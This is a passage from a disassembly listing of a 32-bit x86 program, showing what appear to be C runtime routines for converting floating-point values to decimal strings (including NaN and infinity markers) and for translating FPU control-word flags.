xor ecx, ebp
pop ebx
call sub_402ADC
leave
retn
sub_41279D endp
; ---------------------------------------------------------------------------
db 8Dh, 49h, 0
off_412E31 dd offset loc_412835 ; DATA XREF: sub_41279D+91r
dd offset loc_412889 ; jump table for switch statement
dd offset loc_4128DF
dd offset loc_412912
dd offset loc_412957
dd offset loc_41298F
dd offset loc_4129A3
dd offset loc_4129FE
dd offset loc_4129E9
dd offset loc_412A68
dd offset loc_412A5D
dd offset loc_412A0C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412E61 proc near ; CODE XREF: sub_411B21+3Fp
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1A = dword ptr -1Ah
var_16 = dword ptr -16h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 74h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
mov ebx, [ebp+arg_14]
push esi
push edi
lea esi, [ebp+arg_0]
lea edi, [ebp+var_10]
movsd
movsd
movsw
mov edx, [ebp+var_8]
mov ecx, edx
mov eax, 8000h
and ecx, eax
and edx, 7FFFh
test cx, cx
mov [ebp+var_60], ebx
mov byte ptr [ebp+var_30], 0CCh
mov byte ptr [ebp+var_30+1], 0CCh
mov byte ptr [ebp+var_30+2], 0CCh
mov byte ptr [ebp+var_30+3], 0CCh
mov byte ptr [ebp+var_2C], 0CCh
mov byte ptr [ebp+var_2C+1], 0CCh
mov byte ptr [ebp+var_2C+2], 0CCh
mov byte ptr [ebp+var_2C+3], 0CCh
mov byte ptr [ebp+var_28], 0CCh
mov byte ptr [ebp+var_28+1], 0CCh
mov byte ptr [ebp+var_28+2], 0FBh
mov byte ptr [ebp+var_28+3], 3Fh
mov [ebp+var_74], 1
mov [ebp+var_6C], ecx
jz short loc_412EDB
mov byte ptr [ebx+2], 2Dh
jmp short loc_412EDF
; ---------------------------------------------------------------------------
loc_412EDB: ; CODE XREF: sub_412E61+72j
mov byte ptr [ebx+2], 20h
loc_412EDF: ; CODE XREF: sub_412E61+78j
test dx, dx
mov esi, [ebp+var_C]
mov edi, [ebp+var_10]
jnz short loc_412F18
test esi, esi
jnz short loc_412F18
test edi, edi
jnz short loc_412F18
and [ebx], di
cmp cx, ax
setnz al
dec al
and al, 0Dh
add al, 20h
mov [ebx+2], al
mov byte ptr [ebx+3], 1
mov byte ptr [ebx+4], 30h
mov byte ptr [ebx+5], 0
loc_412F10: ; CODE XREF: sub_412E61+6FBj
; sub_412E61+8C3j
xor eax, eax
inc eax
jmp loc_4136E1
; ---------------------------------------------------------------------------
loc_412F18: ; CODE XREF: sub_412E61+87j
; sub_412E61+8Bj ...
cmp dx, 7FFFh
jnz loc_412FC1
mov eax, 80000000h
cmp esi, eax
mov word ptr [ebx], 1
jnz short loc_412F35
test edi, edi
jz short loc_412F44
loc_412F35: ; CODE XREF: sub_412E61+CEj
test esi, 40000000h
jnz short loc_412F44
push offset a1Snan ; "1#SNAN"
jmp short loc_412F95
; ---------------------------------------------------------------------------
loc_412F44: ; CODE XREF: sub_412E61+D2j
; sub_412E61+DAj
test cx, cx
jz short loc_412F5C
cmp esi, 0C0000000h
jnz short loc_412F5C
test edi, edi
jnz short loc_412F90
push offset a1Ind ; "1#IND"
jmp short loc_412F69
; ---------------------------------------------------------------------------
loc_412F5C: ; CODE XREF: sub_412E61+E6j
; sub_412E61+EEj
cmp esi, eax
jnz short loc_412F90
test edi, edi
jnz short loc_412F90
push offset a1Inf ; "1#INF"
loc_412F69: ; CODE XREF: sub_412E61+F9j
lea eax, [ebx+4]
push 16h
push eax
call sub_407A85
add esp, 0Ch
xor esi, esi
test eax, eax
jz short loc_412F8A
push esi
push esi
push esi
push esi
push esi
call sub_403209
add esp, 14h
loc_412F8A: ; CODE XREF: sub_412E61+11Aj
mov byte ptr [ebx+3], 5
jmp short loc_412FBA
; ---------------------------------------------------------------------------
loc_412F90: ; CODE XREF: sub_412E61+F2j
; sub_412E61+FDj ...
push offset a1Qnan ; "1#QNAN"
loc_412F95: ; CODE XREF: sub_412E61+E1j
lea eax, [ebx+4]
push 16h
push eax
call sub_407A85
add esp, 0Ch
xor esi, esi
test eax, eax
jz short loc_412FB6
push esi
push esi
push esi
push esi
push esi
call sub_403209
add esp, 14h
loc_412FB6: ; CODE XREF: sub_412E61+146j
mov byte ptr [ebx+3], 6
loc_412FBA: ; CODE XREF: sub_412E61+12Dj
xor eax, eax
jmp loc_4136E1
; ---------------------------------------------------------------------------
loc_412FC1: ; CODE XREF: sub_412E61+BCj
movzx ecx, dx
mov ebx, ecx
imul ecx, 4D10h
shr ebx, 8
mov eax, esi
shr eax, 18h
lea eax, [ebx+eax*2]
imul eax, 4Dh
lea eax, [eax+ecx-134312F4h]
sar eax, 10h
movzx ecx, ax
movsx ebx, cx
mov [ebp+var_4C], ecx
xor eax, eax
mov ecx, offset dword_424260
neg ebx
sub ecx, 60h
cmp ebx, eax
mov word ptr [ebp+var_16], dx
mov [ebp+var_1A], esi
mov [ebp+var_20+2], edi
mov word ptr [ebp+var_20], ax
mov [ebp+var_68], ecx
jz loc_4132C0
jge short loc_413021
mov ecx, offset dword_4243C0
neg ebx
sub ecx, 60h
mov [ebp+var_68], ecx
loc_413021: ; CODE XREF: sub_412E61+1B1j
cmp ebx, eax
jz loc_4132C0
loc_413029: ; CODE XREF: sub_412E61+457j
add [ebp+var_68], 54h
mov ecx, ebx
and ecx, 7
sar ebx, 3
test ecx, ecx
jz loc_4132B6
imul ecx, 0Ch
add ecx, [ebp+var_68]
cmp word ptr [ecx], 8000h
mov [ebp+var_64], ecx
jb short loc_413060
mov esi, ecx
lea edi, [ebp+var_3C]
movsd
movsd
lea eax, [ebp+var_3C]
movsd
dec [ebp+var_3C+2]
mov [ebp+var_64], eax
mov ecx, eax
loc_413060: ; CODE XREF: sub_412E61+1EAj
movzx edi, word ptr [ecx+0Ah]
mov edx, [ebp+var_16]
xor eax, eax
mov ecx, edi
mov esi, 7FFFh
xor ecx, edx
and edx, esi
and edi, esi
mov [ebp+var_48], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
and ecx, 8000h
cmp dx, si
lea eax, [edi+edx]
movzx eax, ax
jnb loc_41329A
cmp di, si
jnb loc_41329A
cmp ax, 0BFFDh
ja loc_41329A
cmp ax, 3FBFh
ja short loc_4130C0
xor eax, eax
mov [ebp+var_1A+2], eax
mov [ebp-1Ch], eax
mov [ebp+var_20], eax
jmp loc_4132B6
; ---------------------------------------------------------------------------
loc_4130C0: ; CODE XREF: sub_412E61+24Dj
xor esi, esi
cmp dx, si
jnz short loc_4130E4
inc eax
test [ebp+var_1A+2], 7FFFFFFFh
jnz short loc_4130E4
cmp [ebp-1Ch], esi
jnz short loc_4130E4
cmp [ebp+var_20], esi
jnz short loc_4130E4
mov word ptr [ebp+var_16], si
jmp loc_4132B6
; ---------------------------------------------------------------------------
loc_4130E4: ; CODE XREF: sub_412E61+264j
; sub_412E61+26Ej ...
cmp di, si
jnz short loc_41310D
mov edx, [ebp+var_64]
inc eax
test dword ptr [edx+8], 7FFFFFFFh
jnz short loc_41310D
cmp [edx+4], esi
jnz short loc_41310D
cmp [edx], esi
jnz short loc_41310D
mov [ebp+var_1A+2], esi
mov [ebp-1Ch], esi
mov [ebp+var_20], esi
jmp loc_4132B6
; ---------------------------------------------------------------------------
loc_41310D: ; CODE XREF: sub_412E61+286j
; sub_412E61+293j ...
lea edi, [ebp+var_C]
mov [ebp+var_5C], esi
mov [ebp+var_44], edi
mov [ebp+var_40], 5
loc_41311D: ; CODE XREF: sub_412E61+332j
mov edx, [ebp+var_5C]
mov esi, [ebp+var_40]
add edx, edx
test esi, esi
mov [ebp+var_50], esi
jle short loc_413184
lea edx, [ebp+edx+var_20]
mov [ebp+var_58], edx
mov edx, [ebp+var_64]
add edx, 8
mov [ebp+var_54], edx
loc_41313C: ; CODE XREF: sub_412E61+321j
mov edx, [ebp+var_58]
mov esi, [ebp+var_54]
movzx esi, word ptr [esi]
movzx edx, word ptr [edx]
mov edi, [edi-4]
imul edx, esi
and [ebp+var_70], 0
lea esi, [edi+edx]
cmp esi, edi
jb short loc_41315D
cmp esi, edx
jnb short loc_413164
loc_41315D: ; CODE XREF: sub_412E61+2F6j
mov [ebp+var_70], 1
loc_413164: ; CODE XREF: sub_412E61+2FAj
cmp [ebp+var_70], 0
mov edi, [ebp+var_44]
mov [edi-4], esi
jz short loc_413173
inc word ptr [edi]
loc_413173: ; CODE XREF: sub_412E61+30Dj
add [ebp+var_58], 2
sub [ebp+var_54], 2
dec [ebp+var_50]
cmp [ebp+var_50], 0
jg short loc_41313C
loc_413184: ; CODE XREF: sub_412E61+2C9j
inc edi
inc edi
inc [ebp+var_5C]
dec [ebp+var_40]
cmp [ebp+var_40], 0
mov [ebp+var_44], edi
jg short loc_41311D
add eax, 0C002h
test ax, ax
jle short loc_4131DA
loc_41319F: ; CODE XREF: sub_412E61+372j
test [ebp+var_8], 80000000h
jnz short loc_4131D5
mov edx, [ebp+var_10]
mov edi, [ebp+var_C]
mov esi, [ebp+var_C]
shl [ebp+var_10], 1
shr edx, 1Fh
add edi, edi
or edi, edx
mov edx, [ebp+var_8]
shr esi, 1Fh
add edx, edx
or edx, esi
add eax, 0FFFFh
test ax, ax
mov [ebp+var_C], edi
mov [ebp+var_8], edx
jg short loc_41319F
loc_4131D5: ; CODE XREF: sub_412E61+345j
test ax, ax
jg short loc_41322C
loc_4131DA: ; CODE XREF: sub_412E61+33Cj
add eax, 0FFFFh
test ax, ax
jge short loc_41322C
mov edx, eax
neg edx
movzx edx, dx
mov [ebp+var_44], edx
add eax, edx
loc_4131F0: ; CODE XREF: sub_412E61+3BEj
test byte ptr [ebp+var_10], 1
jz short loc_4131F9
inc [ebp+var_48]
loc_4131F9: ; CODE XREF: sub_412E61+393j
mov edx, [ebp+var_8]
mov edi, [ebp+var_C]
mov esi, [ebp+var_C]
shr [ebp+var_8], 1
shl edx, 1Fh
shr edi, 1
or edi, edx
mov edx, [ebp+var_10]
shl esi, 1Fh
shr edx, 1
or edx, esi
dec [ebp+var_44]
mov [ebp+var_C], edi
mov [ebp+var_10], edx
jnz short loc_4131F0
cmp [ebp+var_48], 0
jz short loc_41322C
or word ptr [ebp+var_10], 1
loc_41322C: ; CODE XREF: sub_412E61+377j
; sub_412E61+381j ...
cmp word ptr [ebp+var_10], 8000h
ja short loc_413245
mov edx, [ebp+var_10]
and edx, 1FFFFh
cmp edx, 18000h
jnz short loc_413278
loc_413245: ; CODE XREF: sub_412E61+3D1j
cmp [ebp+var_10+2], 0FFFFFFFFh
jnz short loc_413275
and [ebp+var_10+2], 0
cmp [ebp+var_C+2], 0FFFFFFFFh
jnz short loc_413270
and [ebp+var_C+2], 0
cmp word ptr [ebp+var_8+2], 0FFFFh
jnz short loc_41326A
mov word ptr [ebp+var_8+2], 8000h
inc eax
jmp short loc_413278
; ---------------------------------------------------------------------------
loc_41326A: ; CODE XREF: sub_412E61+3FEj
inc word ptr [ebp+var_8+2]
jmp short loc_413278
; ---------------------------------------------------------------------------
loc_413270: ; CODE XREF: sub_412E61+3F2j
inc [ebp+var_C+2]
jmp short loc_413278
; ---------------------------------------------------------------------------
loc_413275: ; CODE XREF: sub_412E61+3E8j
inc [ebp+var_10+2]
loc_413278: ; CODE XREF: sub_412E61+3E2j
; sub_412E61+407j ...
cmp ax, 7FFFh
jnb short loc_41329A
mov dx, word ptr [ebp+var_10+2]
mov word ptr [ebp+var_20], dx
mov edx, [ebp+var_C]
mov [ebp+var_20+2], edx
mov edx, [ebp+var_8]
or eax, ecx
mov [ebp+var_1A], edx
mov word ptr [ebp+var_16], ax
jmp short loc_4132B6
; ---------------------------------------------------------------------------
loc_41329A: ; CODE XREF: sub_412E61+230j
; sub_412E61+239j ...
neg cx
sbb ecx, ecx
and dword ptr [ebp-1Ch], 0
and ecx, 80000000h
add ecx, 7FFF8000h
and [ebp+var_20], 0
mov [ebp+var_1A+2], ecx
loc_4132B6: ; CODE XREF: sub_412E61+1D6j
; sub_412E61+25Aj ...
test ebx, ebx
jnz loc_413029
xor eax, eax
loc_4132C0: ; CODE XREF: sub_412E61+1ABj
; sub_412E61+1C2j
mov ecx, [ebp+var_1A+2]
shr ecx, 10h
cmp cx, 3FFFh
mov ebx, 7FFFh
jb loc_413520
mov esi, [ebp+var_28+2]
inc [ebp+var_4C]
movzx edx, cx
mov ecx, esi
xor ecx, edx
and edx, ebx
and esi, ebx
and ecx, 8000h
cmp dx, bx
lea edi, [esi+edx]
mov [ebp+var_58], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
movzx edi, di
jnb loc_413506
cmp si, bx
jnb loc_413506
cmp di, 0BFFDh
ja loc_413506
cmp di, 3FBFh
ja short loc_41332B
loc_413323: ; CODE XREF: sub_412E61+503j
mov [ebp+var_1A+2], eax
jmp loc_41351A
; ---------------------------------------------------------------------------
loc_41332B: ; CODE XREF: sub_412E61+4C0j
cmp dx, ax
jnz short loc_41334D
inc edi
test [ebp+var_1A+2], 7FFFFFFFh
jnz short loc_41334D
cmp [ebp-1Ch], eax
jnz short loc_41334D
cmp [ebp+var_20], eax
jnz short loc_41334D
mov word ptr [ebp+var_16], ax
jmp loc_413520
; ---------------------------------------------------------------------------
loc_41334D: ; CODE XREF: sub_412E61+4CDj
; sub_412E61+4D7j ...
cmp si, ax
jnz short loc_413366
inc edi
test [ebp+var_28], 7FFFFFFFh
jnz short loc_413366
cmp [ebp+var_2C], eax
jnz short loc_413366
cmp [ebp+var_30], eax
jz short loc_413323
loc_413366: ; CODE XREF: sub_412E61+4EFj
; sub_412E61+4F9j ...
and [ebp+var_54], 0
lea eax, [ebp+var_C]
mov [ebp+var_40], 5
loc_413374: ; CODE XREF: sub_412E61+580j
mov edx, [ebp+var_54]
mov esi, [ebp+var_40]
add edx, edx
test esi, esi
mov [ebp+var_50], esi
jle short loc_4133D5
lea esi, [ebp+var_28]
lea edx, [ebp+edx+var_20]
mov [ebp+var_5C], esi
mov [ebp+var_48], edx
loc_413390: ; CODE XREF: sub_412E61+572j
mov edx, [ebp+var_5C]
mov esi, [ebp+var_48]
movzx esi, word ptr [esi]
movzx edx, word ptr [edx]
and [ebp+var_44], 0
imul edx, esi
mov esi, [eax-4]
lea ebx, [esi+edx]
cmp ebx, esi
jb short loc_4133B1
cmp ebx, edx
jnb short loc_4133B8
loc_4133B1: ; CODE XREF: sub_412E61+54Aj
mov [ebp+var_44], 1
loc_4133B8: ; CODE XREF: sub_412E61+54Ej
cmp [ebp+var_44], 0
mov [eax-4], ebx
jz short loc_4133C4
inc word ptr [eax]
loc_4133C4: ; CODE XREF: sub_412E61+55Ej
add [ebp+var_48], 2
sub [ebp+var_5C], 2
dec [ebp+var_50]
cmp [ebp+var_50], 0
jg short loc_413390
loc_4133D5: ; CODE XREF: sub_412E61+520j
inc eax
inc eax
inc [ebp+var_54]
dec [ebp+var_40]
cmp [ebp+var_40], 0
jg short loc_413374
add edi, 0C002h
xor eax, eax
cmp di, ax
jle short loc_41342C
loc_4133F0: ; CODE XREF: sub_412E61+5C4j
test [ebp+var_8], 80000000h
jnz short loc_413427
mov edx, [ebp+var_10]
mov ebx, [ebp+var_C]
mov esi, [ebp+var_C]
shl [ebp+var_10], 1
shr edx, 1Fh
add ebx, ebx
or ebx, edx
mov edx, [ebp+var_8]
shr esi, 1Fh
add edx, edx
or edx, esi
add edi, 0FFFFh
cmp di, ax
mov [ebp+var_C], ebx
mov [ebp+var_8], edx
jg short loc_4133F0
loc_413427: ; CODE XREF: sub_412E61+596j
cmp di, ax
jg short loc_41347B
loc_41342C: ; CODE XREF: sub_412E61+58Dj
add edi, 0FFFFh
cmp di, ax
jge short loc_41347B
mov eax, edi
neg eax
movzx eax, ax
add edi, eax
loc_413440: ; CODE XREF: sub_412E61+60Cj
test byte ptr [ebp+var_10], 1
jz short loc_413449
inc [ebp+var_58]
loc_413449: ; CODE XREF: sub_412E61+5E3j
mov edx, [ebp+var_8]
mov ebx, [ebp+var_C]
mov esi, [ebp+var_C]
shr [ebp+var_8], 1
shl edx, 1Fh
shr ebx, 1
or ebx, edx
mov edx, [ebp+var_10]
shl esi, 1Fh
shr edx, 1
or edx, esi
dec eax
mov [ebp+var_C], ebx
mov [ebp+var_10], edx
jnz short loc_413440
xor eax, eax
cmp [ebp+var_58], eax
jz short loc_41347B
or word ptr [ebp+var_10], 1
loc_41347B: ; CODE XREF: sub_412E61+5C9j
; sub_412E61+5D4j ...
cmp word ptr [ebp+var_10], 8000h
ja short loc_413494
mov edx, [ebp+var_10]
and edx, 1FFFFh
cmp edx, 18000h
jnz short loc_4134C5
loc_413494: ; CODE XREF: sub_412E61+620j
cmp [ebp+var_10+2], 0FFFFFFFFh
jnz short loc_4134C2
cmp [ebp+var_C+2], 0FFFFFFFFh
mov [ebp+var_10+2], eax
jnz short loc_4134BD
cmp word ptr [ebp+var_8+2], 0FFFFh
mov [ebp+var_C+2], eax
jnz short loc_4134B7
mov word ptr [ebp+var_8+2], 8000h
inc edi
jmp short loc_4134C5
; ---------------------------------------------------------------------------
loc_4134B7: ; CODE XREF: sub_412E61+64Bj
inc word ptr [ebp+var_8+2]
jmp short loc_4134C5
; ---------------------------------------------------------------------------
loc_4134BD: ; CODE XREF: sub_412E61+640j
inc [ebp+var_C+2]
jmp short loc_4134C5
; ---------------------------------------------------------------------------
loc_4134C2: ; CODE XREF: sub_412E61+637j
inc [ebp+var_10+2]
loc_4134C5: ; CODE XREF: sub_412E61+631j
; sub_412E61+654j ...
cmp di, 7FFFh
jb short loc_4134EA
neg cx
mov [ebp-1Ch], eax
mov [ebp+var_20], eax
sbb ecx, ecx
and ecx, 80000000h
add ecx, 7FFF8000h
mov [ebp+var_1A+2], ecx
loc_4134E6: ; CODE XREF: sub_412E61+6A3j
xor eax, eax
jmp short loc_413520
; ---------------------------------------------------------------------------
loc_4134EA: ; CODE XREF: sub_412E61+669j
mov ax, word ptr [ebp+var_10+2]
mov word ptr [ebp+var_20], ax
mov eax, [ebp+var_C]
mov [ebp+var_20+2], eax
mov eax, [ebp+var_8]
or edi, ecx
mov [ebp+var_1A], eax
mov word ptr [ebp+var_16], di
jmp short loc_4134E6
; ---------------------------------------------------------------------------
loc_413506: ; CODE XREF: sub_412E61+4A1j
; sub_412E61+4AAj ...
neg cx
sbb ecx, ecx
and ecx, 80000000h
add ecx, 7FFF8000h
mov [ebp+var_1A+2], ecx
loc_41351A: ; CODE XREF: sub_412E61+4C5j
mov [ebp-1Ch], eax
mov [ebp+var_20], eax
loc_413520: ; CODE XREF: sub_412E61+46Fj
; sub_412E61+4E7j ...
test [ebp+arg_10], 1
mov edx, [ebp+var_60]
mov ecx, [ebp+var_4C]
mov [edx], cx
jz short loc_413561
movsx ecx, cx
add [ebp+arg_C], ecx
cmp [ebp+arg_C], eax
jg short loc_413561
and word ptr [edx], 0
cmp word ptr [ebp+var_6C], 8000h
mov byte ptr [edx+3], 1
setnz al
dec al
and al, 0Dh
add al, 20h
mov [edx+2], al
mov byte ptr [edx+4], 30h
mov byte ptr [edx+5], 0
jmp loc_412F10
; ---------------------------------------------------------------------------
loc_413561: ; CODE XREF: sub_412E61+6CCj
; sub_412E61+6D7j
push 15h
pop ecx
cmp [ebp+arg_C], ecx
jle short loc_41356C
mov [ebp+arg_C], ecx
loc_41356C: ; CODE XREF: sub_412E61+706j
mov esi, [ebp+var_1A+2]
shr esi, 10h
push 8
sub esi, 3FFEh
mov word ptr [ebp+var_16], ax
pop ebx
loc_41357F: ; CODE XREF: sub_412E61+742j
mov eax, [ebp+var_20]
mov edi, [ebp-1Ch]
mov ecx, [ebp-1Ch]
shl [ebp+var_20], 1
shr eax, 1Fh
add edi, edi
or edi, eax
mov eax, [ebp+var_1A+2]
shr ecx, 1Fh
add eax, eax
or eax, ecx
dec ebx
mov [ebp-1Ch], edi
mov [ebp+var_1A+2], eax
jnz short loc_41357F
test esi, esi
jge short loc_4135DB
neg esi
and esi, 0FFh
jle short loc_4135DB
loc_4135B3: ; CODE XREF: sub_412E61+778j
mov eax, [ebp+var_1A+2]
mov edi, [ebp-1Ch]
mov ecx, [ebp-1Ch]
shr [ebp+var_1A+2], 1
shl eax, 1Fh
shr edi, 1
or edi, eax
mov eax, [ebp+var_20]
shl ecx, 1Fh
shr eax, 1
or eax, ecx
dec esi
test esi, esi
mov [ebp-1Ch], edi
mov [ebp+var_20], eax
jg short loc_4135B3
loc_4135DB: ; CODE XREF: sub_412E61+746j
; sub_412E61+750j
mov eax, [ebp+arg_C]
inc eax
test eax, eax
lea ebx, [edx+4]
mov [ebp+var_40], ebx
mov [ebp+var_4C], eax
jle loc_4136A5
loc_4135F0: ; CODE XREF: sub_412E61+83Ej
mov edx, [ebp+var_20]
mov eax, [ebp-1Ch]
lea esi, [ebp+var_20]
lea edi, [ebp+var_3C]
movsd
movsd
movsd
shl [ebp+var_20], 1
mov edi, [ebp+var_20]
shl [ebp+var_20], 1
shr edx, 1Fh
lea ecx, [eax+eax]
or ecx, edx
mov edx, [ebp+var_1A+2]
mov esi, eax
shr esi, 1Fh
add edx, edx
or edx, esi
mov eax, ecx
lea esi, [ecx+ecx]
shr eax, 1Fh
lea ecx, [edx+edx]
mov edx, [ebp+var_3C]
shr edi, 1Fh
or ecx, eax
mov eax, [ebp+var_20]
or esi, edi
lea edi, [edx+eax]
cmp edi, eax
jb short loc_41363F
cmp edi, edx
jnb short loc_413657
loc_41363F: ; CODE XREF: sub_412E61+7D8j
lea eax, [esi+1]
xor edx, edx
cmp eax, esi
jb short loc_41364D
cmp eax, 1
jnb short loc_413650
loc_41364D: ; CODE XREF: sub_412E61+7E5j
xor edx, edx
inc edx
loc_413650: ; CODE XREF: sub_412E61+7EAj
test edx, edx
mov esi, eax
jz short loc_413657
inc ecx
loc_413657: ; CODE XREF: sub_412E61+7DCj
; sub_412E61+7F3j
mov eax, [ebp+var_38]
lea edx, [eax+esi]
cmp edx, esi
mov [ebp+var_44], edx
jb short loc_413668
cmp edx, eax
jnb short loc_413669
loc_413668: ; CODE XREF: sub_412E61+801j
inc ecx
loc_413669: ; CODE XREF: sub_412E61+805j
add ecx, [ebp+var_34]
shr edx, 1Fh
add ecx, ecx
or ecx, edx
lea esi, [edi+edi]
mov [ebp+var_20], esi
mov esi, [ebp+var_44]
mov [ebp+var_1A+2], ecx
shr ecx, 18h
add esi, esi
add cl, 30h
mov eax, edi
shr eax, 1Fh
or esi, eax
mov [ebx], cl
inc ebx
dec [ebp+var_4C]
cmp [ebp+var_4C], 0
mov [ebp-1Ch], esi
mov byte ptr [ebp+var_16+1], 0
jg loc_4135F0
loc_4136A5: ; CODE XREF: sub_412E61+789j
dec ebx
mov al, [ebx]
dec ebx
cmp al, 35h
jge short loc_4136BB
mov ecx, [ebp+var_40]
jmp short loc_4136F6
; ---------------------------------------------------------------------------
loc_4136B2: ; CODE XREF: sub_412E61+85Dj
cmp byte ptr [ebx], 39h
jnz short loc_4136C0
mov byte ptr [ebx], 30h
dec ebx
loc_4136BB: ; CODE XREF: sub_412E61+84Aj
cmp ebx, [ebp+var_40]
jnb short loc_4136B2
loc_4136C0: ; CODE XREF: sub_412E61+854j
cmp ebx, [ebp+var_40]
mov eax, [ebp+var_60]
jnb short loc_4136CC
inc ebx
inc word ptr [eax]
loc_4136CC: ; CODE XREF: sub_412E61+865j
inc byte ptr [ebx]
loc_4136CE: ; CODE XREF: sub_412E61+89Ej
sub bl, al
sub bl, 3
movsx ecx, bl
mov [eax+3], bl
mov byte ptr [ecx+eax+4], 0
mov eax, [ebp+var_74]
loc_4136E1: ; CODE XREF: sub_412E61+B2j
; sub_412E61+15Bj
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402ADC
leave
retn
; ---------------------------------------------------------------------------
loc_4136F0: ; CODE XREF: sub_412E61+897j
cmp byte ptr [ebx], 30h
jnz short loc_4136FA
dec ebx
loc_4136F6: ; CODE XREF: sub_412E61+84Fj
cmp ebx, ecx
jnb short loc_4136F0
loc_4136FA: ; CODE XREF: sub_412E61+892j
cmp ebx, ecx
mov eax, [ebp+var_60]
jnb short loc_4136CE
and word ptr [eax], 0
cmp word ptr [ebp+var_6C], 8000h
mov byte ptr [eax+3], 1
setnz dl
dec dl
and dl, 0Dh
add dl, 20h
mov [eax+2], dl
mov byte ptr [ecx], 30h
mov byte ptr [eax+5], 0
jmp loc_412F10
sub_412E61 endp
; =============== S U B R O U T I N E =======================================
sub_413729 proc near ; CODE XREF: sub_413857+C0p
xor eax, eax
test bl, 10h
jz short loc_413731
inc eax
loc_413731: ; CODE XREF: sub_413729+5j
test bl, 8
jz short loc_413739
or eax, 4
loc_413739: ; CODE XREF: sub_413729+Bj
test bl, 4
jz short loc_413741
or eax, 8
loc_413741: ; CODE XREF: sub_413729+13j
test bl, 2
jz short loc_413749
or eax, 10h
loc_413749: ; CODE XREF: sub_413729+1Bj
test bl, 1
jz short loc_413751
or eax, 20h
loc_413751: ; CODE XREF: sub_413729+23j
test ebx, 80000h
jz short loc_41375C
or eax, 2
loc_41375C: ; CODE XREF: sub_413729+2Ej
mov ecx, ebx
mov edx, 300h
and ecx, edx
push esi
mov esi, 200h
jz short loc_413790
cmp ecx, 100h
jz short loc_41378B
cmp ecx, esi
jz short loc_413784
cmp ecx, edx
jnz short loc_413790
or eax, 0C00h
jmp short loc_413790
; ---------------------------------------------------------------------------
loc_413784: ; CODE XREF: sub_413729+4Ej
or eax, 800h
jmp short loc_413790
; ---------------------------------------------------------------------------
loc_41378B: ; CODE XREF: sub_413729+4Aj
or eax, 400h
loc_413790: ; CODE XREF: sub_413729+42j
; sub_413729+52j ...
mov ecx, ebx
and ecx, 30000h
jz short loc_4137A6
cmp ecx, 10000h
jnz short loc_4137A8
or eax, esi
jmp short loc_4137A8
; ---------------------------------------------------------------------------
loc_4137A6: ; CODE XREF: sub_413729+6Fj
or eax, edx
loc_4137A8: ; CODE XREF: sub_413729+77j
; sub_413729+7Bj
test ebx, 40000h
pop esi
jz short locret_4137B6
or eax, 1000h
locret_4137B6: ; CODE XREF: sub_413729+86j
retn
sub_413729 endp
; =============== S U B R O U T I N E =======================================
sub_4137B7 proc near ; CODE XREF: sub_413857:loc_413A90p
xor eax, eax
test dl, 10h
jz short loc_4137C3
mov eax, 80h
loc_4137C3: ; CODE XREF: sub_4137B7+5j
test dl, 8
push ebx
push esi
push edi
mov ebx, 200h
jz short loc_4137D2
or eax, ebx
loc_4137D2: ; CODE XREF: sub_4137B7+17j
test dl, 4
jz short loc_4137DC
or eax, 400h
loc_4137DC: ; CODE XREF: sub_4137B7+1Ej
test dl, 2
jz short loc_4137E6
or eax, 800h
loc_4137E6: ; CODE XREF: sub_4137B7+28j
test dl, 1
jz short loc_4137F0
or eax, 1000h
loc_4137F0: ; CODE XREF: sub_4137B7+32j
test edx, 80000h
mov edi, 100h
jz short loc_4137FF
or eax, edi
loc_4137FF: ; CODE XREF: sub_4137B7+44j
mov ecx, edx
mov esi, 300h
and ecx, esi
jz short loc_413829
cmp ecx, edi
jz short loc_413824
cmp ecx, ebx
jz short loc_41381D
cmp ecx, esi
jnz short loc_413829
or eax, 6000h
jmp short loc_413829
; ---------------------------------------------------------------------------
loc_41381D: ; CODE XREF: sub_4137B7+59j
or eax, 4000h
jmp short loc_413829
; ---------------------------------------------------------------------------
loc_413824: ; CODE XREF: sub_4137B7+55j
or eax, 2000h
loc_413829: ; CODE XREF: sub_4137B7+51j
; sub_4137B7+5Dj ...
mov ecx, 3000000h
pop edi
and edx, ecx
cmp edx, 1000000h
pop esi
pop ebx
jz short loc_413851
cmp edx, 2000000h
jz short loc_41384D
cmp edx, ecx
jnz short locret_413856
or eax, 8000h
retn
; ---------------------------------------------------------------------------
loc_41384D: ; CODE XREF: sub_4137B7+8Aj
or eax, 40h
retn
; ---------------------------------------------------------------------------
loc_413851: ; CODE XREF: sub_4137B7+82j
or eax, 8040h
locret_413856: ; CODE XREF: sub_4137B7+8Ej
retn
sub_4137B7 endp
; =============== S U B R O U T I N E =======================================
sub_413857 proc near ; CODE XREF: sub_411CAF+25p
; sub_411CAF+55p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 10h
push ebx
push ebp
push esi
push edi
fstcw word ptr [esp+20h+var_C]
mov ebx, [esp+20h+var_C]
xor edx, edx
test bl, 1
jz short loc_413871
push 10h
pop edx
loc_413871: ; CODE XREF: sub_413857+15j
test bl, 4
jz short loc_413879
or edx, 8
loc_413879: ; CODE XREF: sub_413857+1Dj
test bl, 8
jz short loc_413881
or edx, 4
loc_413881: ; CODE XREF: sub_413857+25j
test bl, 10h
jz short loc_413889
or edx, 2
loc_413889: ; CODE XREF: sub_413857+2Dj
test bl, 20h
jz short loc_413891
or edx, 1
